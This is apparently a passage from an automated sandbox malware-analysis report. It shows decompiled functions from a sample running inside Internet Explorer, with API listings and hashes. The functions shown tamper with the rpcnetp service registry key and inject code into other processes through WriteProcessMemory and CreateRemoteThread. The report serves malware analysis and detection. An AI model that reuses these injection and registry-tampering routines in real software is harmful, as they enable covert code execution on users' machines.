					_t19 = _t34 + 0x1b18;
					_a4 = _t19;
					EnterCriticalSection(_t19);
					_t20 =  *(_t34 + 0x1b40);
					if(_t20 != 0) {
						SetEvent(_t20);
					}
					_t21 =  *(_t34 + 0x1b10);
					if(_t21 != 0) {
						SetEvent(_t21);
					}
					_t22 =  *(_t34 + 0x1b0c);
					if(_t22 != 0) {
						WaitForSingleObject(_t22, 0x7d0);
						CloseHandle( *(_t34 + 0x1b0c));
						 *(_t34 + 0x1b0c) =  *(_t34 + 0x1b0c) & 0x00000000;
					}
					_t23 =  *(_t34 + 0x1b40);
					if(_t23 != 0) {
						_t23 = CloseHandle(_t23);
					}
					_t35 =  *(_t34 + 0x1b10);
					if(_t35 != 0) {
						_t23 = CloseHandle(_t35);
					}
					DeleteCriticalSection(_a4);
					return _t23;
				}
				return _t17;
			}

APIs
  • EnterCriticalSection.KERNEL32(?,00000000,00000080,?,?,72B21E7E,?,?,?,?,72B21F52,?,00000000,?,72B23101,00000000), ref: 72B216E3
  • SetEvent.KERNEL32(?,?,72B21E7E,?,?,?,?,72B21F52,?,00000000,?,72B23101,00000000,?), ref: 72B216FA
  • SetEvent.KERNEL32(?,?,72B21E7E,?,?,?,?,72B21F52,?,00000000,?,72B23101,00000000,?), ref: 72B21707
  • WaitForSingleObject.KERNEL32(?,000007D0,?,72B21E7E,?,?,?,?,72B21F52,?,00000000,?,72B23101,00000000,?), ref: 72B2171F
  • CloseHandle.KERNEL32(?,?,72B21E7E,?,?,?,?,72B21F52,?,00000000,?,72B23101,00000000,?), ref: 72B2172B
  • CloseHandle.KERNEL32(?,?,72B21E7E,?,?,?,?,72B21F52,?,00000000,?,72B23101,00000000,?), ref: 72B2173F
  • CloseHandle.KERNEL32(?,?,72B21E7E,?,?,?,?,72B21F52,?,00000000,?,72B23101,00000000,?), ref: 72B2174C
  • DeleteCriticalSection.KERNEL32(?,?,72B21E7E,?,?,?,?,72B21F52,?,00000000,?,72B23101,00000000,?), ref: 72B21751
Memory Dump Source
  • Source File: 00000008.00000002.940952004.0000000072B21000.00000020.00020000.sdmp, Offset: 72B20000, based on PE: true
  • Associated: 00000008.00000002.940903627.0000000072B20000.00000002.00020000.sdmp
  • Associated: 00000008.00000002.940979745.0000000072B26000.00000004.00020000.sdmp
  • Associated: 00000008.00000002.941005619.0000000072B28000.00000002.00020000.sdmp
Joe Sandbox IDA Plugin
  • Snapshot File: hcaresult_8_2_72b20000_iexplore.jbxd
Similarity
  • API ID: CloseHandle$CriticalEventSection$DeleteEnterObjectSingleWait
  • String ID:
  • API String ID: 2299618653-0
  • Opcode ID: 17a48539fed4873c5e27a783ff253b1c6096266a9993aaa7f4632e88b4429619
  • Instruction ID: 2178e58ac556364a2b17c8ba54c2abf152cba4207c59054d382db62ef48bba22
  • Opcode Fuzzy Hash: 17a48539fed4873c5e27a783ff253b1c6096266a9993aaa7f4632e88b4429619
  • Instruction Fuzzy Hash: 04113075610744ABCB21AE7ACD84BC7BBFCEF84795B115819E95EE3212E734E8008A64
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 100%
			E72B22296() {
				int _v8;
				void* _v12;
				char _v44;
				long _t13;
				int _t23;

				_v8 = 0x80;
				_t13 = RegOpenKeyA(0x80000002, "System\\CurrentControlSet\\Services\\rpcnetp",  &_v12);
				if(_t13 == 0) {
					RegQueryValueExA(_v12, 0, 0, 0, 0x72b260c8,  &_v8);
					_t23 = 0x20;
					while(1) {
						_v8 = _t23;
						if(RegEnumValueA(_v12, 0,  &_v44,  &_v8, 0, 0, 0, 0) != 0) {
							break;
						}
						RegDeleteValueA(_v12,  &_v44);
					}
					return RegCloseKey(_v12);
				}
				return _t13;
			}

APIs
  • RegOpenKeyA.ADVAPI32(80000002,System\CurrentControlSet\Services\rpcnetp,?), ref: 72B222B1
  • RegQueryValueExA.ADVAPI32(?,00000000,00000000,00000000,72B260C8,00000080,00000002,00000000,00000001), ref: 72B222CF
  • RegDeleteValueA.ADVAPI32(?,?), ref: 72B222E7
  • RegEnumValueA.ADVAPI32 ref: 72B22300
  • RegCloseKey.ADVAPI32(?), ref: 72B22309
Strings
  • System\CurrentControlSet\Services\rpcnetp, xrefs: 72B222A0
Memory Dump Source
  • Source File: 00000008.00000002.940952004.0000000072B21000.00000020.00020000.sdmp, Offset: 72B20000, based on PE: true
  • Associated: 00000008.00000002.940903627.0000000072B20000.00000002.00020000.sdmp
  • Associated: 00000008.00000002.940979745.0000000072B26000.00000004.00020000.sdmp
  • Associated: 00000008.00000002.941005619.0000000072B28000.00000002.00020000.sdmp
Joe Sandbox IDA Plugin
  • Snapshot File: hcaresult_8_2_72b20000_iexplore.jbxd
Similarity
  • API ID: Value$CloseDeleteEnumOpenQuery
  • String ID: System\CurrentControlSet\Services\rpcnetp
  • API String ID: 1768883651-3077676073
  • Opcode ID: dbc8a239d347661229ba9342a2df6a68b04c2aeedf9f02f1e23618de36513fb7
  • Instruction ID: a7eab7136433f130f13a6380ef9fab967bd967ebe69315b92658c948a71fe067
  • Opcode Fuzzy Hash: dbc8a239d347661229ba9342a2df6a68b04c2aeedf9f02f1e23618de36513fb7
  • Instruction Fuzzy Hash: 9E010C76901218BBDB219A96CD48EDF7FBCEF452A1F101065FA05F2002D7319A45EBB4
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 75%
			E72B21C7B() {
				void* _t40;
				long _t41;
				void* _t42;
				void* _t43;
				void* _t44;
				void* _t45;
				void* _t46;
				void* _t47;
				void* _t48;

				_push(0x10);
				_push(0x72b25398);
				E72B24A94(_t40, _t44, _t46);
				 *(_t48 - 0x1c) = LocalAlloc(0x40, 0x4464);
				_t45 = GetStdHandle(0xfffffff4);
				 *(_t48 - 4) =  *(_t48 - 4) & 0x00000000;
				if( *(_t48 - 0x1c) != 0) {
					_push(_t48 - 0x20);
					_t41 = 4;
					_t47 =  *(_t48 + 8);
					if(WriteProcessMemory(_t45, _t47 + 0x84, _t48 - 0x1c, _t41, ??) != 0 && ReadProcessMemory(_t45, _t47,  *(_t48 - 0x1c), 0x78, _t48 - 0x20) != 0) {
						 *( *(_t48 - 0x1c) + 0x6c) = _t41;
						 *( *(_t48 - 0x1c) + 0x70) =  *( *(_t48 - 0x1c) + 0x70) | 0xffffffff;
						 *( *(_t48 - 0x1c) + 0x370c) =  *( *(_t48 - 0x1c) + 0x370c) | _t41;
						 *( *(_t48 - 0x1c) + 0x1bd4) = _t47;
						E72B21F95(_t41, _t42, _t43, _t45, _t47,  *( *(_t48 - 0x1c) + 0x370c),  *(_t48 - 0x1c));
					}
					LocalFree( *(_t48 - 0x1c));
				}
				 *(_t48 - 4) =  *(_t48 - 4) | 0xffffffff;
				ExitThread(0);
			}

APIs
  • LocalAlloc.KERNEL32(00000040,00004464,72B25398,00000010), ref: 72B21C8E
  • GetStdHandle.KERNEL32(000000F4), ref: 72B21C99
  • WriteProcessMemory.KERNEL32(00000000,?,00000000,00000004,?), ref: 72B21CC2
  • ReadProcessMemory.KERNEL32(00000000,?,00000000,00000078,?), ref: 72B21CD7
    • Part of subcall function 72B21F95: GetStdHandle.KERNEL32(000000F4,72B253A8,000006C0,72B21D08,00000000), ref: 72B21FB7
    • Part of subcall function 72B21F95: GetStdHandle.KERNEL32(000000F6,000000FF,?,?,?,?,0000032E,?,00000000,0000032E), ref: 72B22033
    • Part of subcall function 72B21F95: CreateRemoteThread.KERNEL32(?,00000000,00000000,00000000,?,00000004,?), ref: 72B2205F
    • Part of subcall function 72B21F95: ResumeThread.KERNEL32(00000000,?,?,72B21829,00000001,?,?,00000000,00000002,000000FF,?,?,?,?,0000032E,?), ref: 72B220C1
    • Part of subcall function 72B21F95: WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 72B220D0
    • Part of subcall function 72B21F95: CloseHandle.KERNEL32(00000000), ref: 72B220D9
  • LocalFree.KERNEL32(00000000), ref: 72B21D0B
  • ExitThread.KERNEL32 ref: 72B21D20
Memory Dump Source
  • Source File: 00000008.00000002.940952004.0000000072B21000.00000020.00020000.sdmp, Offset: 72B20000, based on PE: true
  • Associated: 00000008.00000002.940903627.0000000072B20000.00000002.00020000.sdmp
  • Associated: 00000008.00000002.940979745.0000000072B26000.00000004.00020000.sdmp
  • Associated: 00000008.00000002.941005619.0000000072B28000.00000002.00020000.sdmp
Joe Sandbox IDA Plugin
  • Snapshot File: hcaresult_8_2_72b20000_iexplore.jbxd
Similarity
  • API ID: Handle$Thread$LocalMemoryProcess$AllocCloseCreateExitFreeMultipleObjectsReadRemoteResumeWaitWrite
  • String ID:
  • API String ID: 3187294079-0
  • Opcode ID: 0d373e486fbd5fa3d520274f4ca0a1fec86b10583ae1df6bb5ea309636de2055
  • Instruction ID: c86dc8486e0665793866c7a9820250b529532658d765509b66e6b22a8b28303e
  • Opcode Fuzzy Hash: 0d373e486fbd5fa3d520274f4ca0a1fec86b10583ae1df6bb5ea309636de2055
  • Instruction Fuzzy Hash: 52113A7295034AEFDB118FA5CC48FEE7BF8EB44361F158229E529B7192D7389501CB20
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 38%
			E72B224BC(void* __ecx, void* _a4, _Unknown_base(*)()* _a8, void* _a12, intOrPtr _a16, DWORD* _a20, intOrPtr _a24) {
				intOrPtr _v8;
				int _v12;
				void* _t14;
				int _t15;
				DWORD* _t20;
				intOrPtr _t24;

				_t20 = _a20;
				_t24 = _a16;
				_v12 = 0;
				_v8 = _t24;
				 *_t20 = 0;
				_t14 = CreateRemoteThread(_a4, 0, 0, _a8, _a12, 0, 0);
				_v12 = _t14;
				if(_t14 == 0) {
					_t15 = TerminateProcess(_a4, 0);
				} else {
					if(_a24 != 0) {
						_push(0xffffffff);
						_push(0);
						_push( &_v12);
						if(_t24 == 0) {
							_push(1);
						} else {
							_push(2);
						}
						if(WaitForMultipleObjects() == 0) {
							GetExitCodeThread(_v12, _t20);
						}
					} else {
						 *_t20 = 1;
					}
					_t15 = CloseHandle(_v12);
				}
				return _t15;
			}

APIs
  • CreateRemoteThread.KERNEL32(?,00000000,00000000,?,?,00000000,00000000), ref: 72B224E1
  • WaitForMultipleObjects.KERNEL32(00000001,?,00000000,000000FF), ref: 72B2250C
  • GetExitCodeThread.KERNEL32(?,?), ref: 72B2251A
  • CloseHandle.KERNEL32(?), ref: 72B22523
  • TerminateProcess.KERNEL32(?,00000000), ref: 72B2252F
Memory Dump Source
  • Source File: 00000008.00000002.940952004.0000000072B21000.00000020.00020000.sdmp, Offset: 72B20000, based on PE: true
  • Associated: 00000008.00000002.940903627.0000000072B20000.00000002.00020000.sdmp
  • Associated: 00000008.00000002.940979745.0000000072B26000.00000004.00020000.sdmp
  • Associated: 00000008.00000002.941005619.0000000072B28000.00000002.00020000.sdmp
Joe Sandbox IDA Plugin
  • Snapshot File: hcaresult_8_2_72b20000_iexplore.jbxd
Similarity
  • API ID: Thread$CloseCodeCreateExitHandleMultipleObjectsProcessRemoteTerminateWait
  • String ID:
  • API String ID: 1317926807-0
  • Opcode ID: ad490c33ec95803bfa012c41048570bec1150f9c707f8b142208b7c855e28eec
  • Instruction ID: 43fb7a0f769fbdbb6116ecc8b05a183b5ca6aff15e3d6e9499a38349c8af174b
  • Opcode Fuzzy Hash: ad490c33ec95803bfa012c41048570bec1150f9c707f8b142208b7c855e28eec
  • Instruction Fuzzy Hash: E6113971401228BFCB225F56CC58ECF7FB9EF497A2F118505F50AA6152D3309651CBA1
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 59%
			E72B229E4(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t53;
				signed int _t58;
				void* _t61;
				intOrPtr _t63;
				intOrPtr _t65;
				void* _t66;

				_t61 = __edx;
				_push(0x40);
				_push(0x72b253e8);
				E72B24A94(__ebx, __edi, __esi);
				_t65 =  *((intOrPtr*)(_t66 + 8));
				_t58 = 0;
				 *((intOrPtr*)(_t66 - 0x20)) = 0;
				_t63 = 0;
				 *(_t66 - 4) = 0;
				while(1) {
					_push(_t58);
					_push(_t58);
					_push(_t66 - 0x24);
					_push( *((intOrPtr*)(_t65 + 0x3c60)));
					if( *((intOrPtr*)(_t65 + 0x3c80))() == 0 ||  *((intOrPtr*)(_t66 - 0x24)) == _t58) {
						break;
					}
					_t53 =  *((intOrPtr*)(_t66 + 0x10)) - _t63;
					if(_t53 >  *((intOrPtr*)(_t66 - 0x24))) {
						_t53 =  *((intOrPtr*)(_t66 - 0x24));
					}
					_push(_t66 - 0x1c);
					_push(_t53);
					_push( *((intOrPtr*)(_t66 + 0xc)) + _t63);
					_push( *((intOrPtr*)(_t65 + 0x3c60)));
					if( *((intOrPtr*)(_t65 + 0x3c84))() != 0 &&  *((intOrPtr*)(_t66 - 0x1c)) != _t58) {
						_t63 = _t63 +  *((intOrPtr*)(_t66 - 0x1c));
						 *((intOrPtr*)(_t66 - 0x28)) = _t63;
						continue;
					}
					break;
				}
				 *((intOrPtr*)( *((intOrPtr*)(_t66 + 0x14)))) = _t63;
				if(_t63 != _t58) {
					lstrcpyA(_t66 - 0x50, "TagId");
					 *((intOrPtr*)(_t66 - 0x1c)) = 0x28;
					_push(0);
					_push(_t66 - 0x1c);
					_push(_t66 - 0x50);
					_push(0xffff);
					_push( *((intOrPtr*)(_t65 + 0x3c60)));
					if( *((intOrPtr*)(_t65 + 0x3c88))() != 0) {
						lstrcpyA(_t65 + 0x3cb0, _t66 - 0x50);
					}
					 *((intOrPtr*)(_t66 - 0x20)) = E72B22F96( *((intOrPtr*)(_t66 + 0xc)), _t63);
					_t58 = 0;
				}
				 *(_t66 - 4) =  *(_t66 - 4) | 0xffffffff;
				if( *((intOrPtr*)(_t66 - 0x20)) == _t58) {
					 *(_t65 + 0x5c) =  *(_t65 + 0x5c) & 0x000000fb;
					 *((intOrPtr*)( *((intOrPtr*)(_t66 + 0x14)))) = _t58;
				}
				return E72B2159C( *((intOrPtr*)(_t66 - 0x20)), _t61);
			}

APIs
Strings
Memory Dump Source
  • Source File: 00000008.00000002.940952004.0000000072B21000.00000020.00020000.sdmp, Offset: 72B20000, based on PE: true
  • Associated: 00000008.00000002.940903627.0000000072B20000.00000002.00020000.sdmp
  • Associated: 00000008.00000002.940979745.0000000072B26000.00000004.00020000.sdmp
  • Associated: 00000008.00000002.941005619.0000000072B28000.00000002.00020000.sdmp
Joe Sandbox IDA Plugin
  • Snapshot File: hcaresult_8_2_72b20000_iexplore.jbxd
Similarity
  • API ID: lstrcpy
  • String ID: ($TagId
  • API String ID: 3722407311-2515966560
  • Opcode ID: 5c04ce69d854c161a030a32ac655c9bf5b29ab1e6395f1117f767b8e90661107
  • Instruction ID: 937e6d634195ed91134bc96762776da25fbf2bc6e85c9379a4a0c7bdf025302a
  • Opcode Fuzzy Hash: 5c04ce69d854c161a030a32ac655c9bf5b29ab1e6395f1117f767b8e90661107
  • Instruction Fuzzy Hash: 0031EAB190074A9FEB21CFA9CD849EEB7F8FF49301F104529E56AF6550DB70AA00CB20
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 100%
			E72B21F30(void* _a4, intOrPtr _a8) {
				void* _t6;
				void* _t8;
				void* _t14;

				_t14 = _a4;
				if(_t14 != 0) {
					_t16 = _a8;
					if(_a8 != 0) {
						E72B21DE6(_t14, 0x7fffffff);
					}
					E72B21E58(_t16, _t14);
					_t8 =  *(_t14 + 0x3ba4);
					if(_t8 != 0) {
						if(WaitForSingleObject(_t8, 0x1388) == 0x102) {
							TerminateThread( *(_t14 + 0x3ba4), 0);
						}
						CloseHandle( *(_t14 + 0x3ba4));
					}
					return LocalFree(_t14);
				}
				return _t6;
			}

APIs
  • WaitForSingleObject.KERNEL32(?,00001388,?,00000000,?,72B23101,00000000,?), ref: 72B21F62
  • TerminateThread.KERNEL32(?,00000000,?,72B23101,00000000,?), ref: 72B21F77
  • CloseHandle.KERNEL32(?,?,72B23101,00000000,?), ref: 72B21F83
  • LocalFree.KERNEL32(?,?,00000000,?,72B23101,00000000,?), ref: 72B21F8A
    • Part of subcall function 72B21DE6: GetMessageA.USER32 ref: 72B21E0C
    • Part of subcall function 72B21DE6: TranslateMessage.USER32(?), ref: 72B21E33
    • Part of subcall function 72B21DE6: DispatchMessageA.USER32 ref: 72B21E3D
Memory Dump Source
  • Source File: 00000008.00000002.940952004.0000000072B21000.00000020.00020000.sdmp, Offset: 72B20000, based on PE: true
  • Associated: 00000008.00000002.940903627.0000000072B20000.00000002.00020000.sdmp
  • Associated: 00000008.00000002.940979745.0000000072B26000.00000004.00020000.sdmp
  • Associated: 00000008.00000002.941005619.0000000072B28000.00000002.00020000.sdmp
Joe Sandbox IDA Plugin
  • Snapshot File: hcaresult_8_2_72b20000_iexplore.jbxd
Similarity
  • API ID: Message$CloseDispatchFreeHandleLocalObjectSingleTerminateThreadTranslateWait
  • String ID:
  • API String ID: 2048180657-0
  • Opcode ID: 96f95f19e928b8abd5f893f00144e223d4d97deb48a41187eccbe0a9266068be
  • Instruction ID: 30d08b297c30fda9417a0af8e49c41b064fc214c9d90f03f7e5885ec2cf4e8c1
  • Opcode Fuzzy Hash: 96f95f19e928b8abd5f893f00144e223d4d97deb48a41187eccbe0a9266068be
  • Instruction Fuzzy Hash: 4AF0B432161B10ABC7216A26CC08BCB76ECDF81796F111514F62AA6183C77455408B95
Uniqueness

Uniqueness Score: -1.00%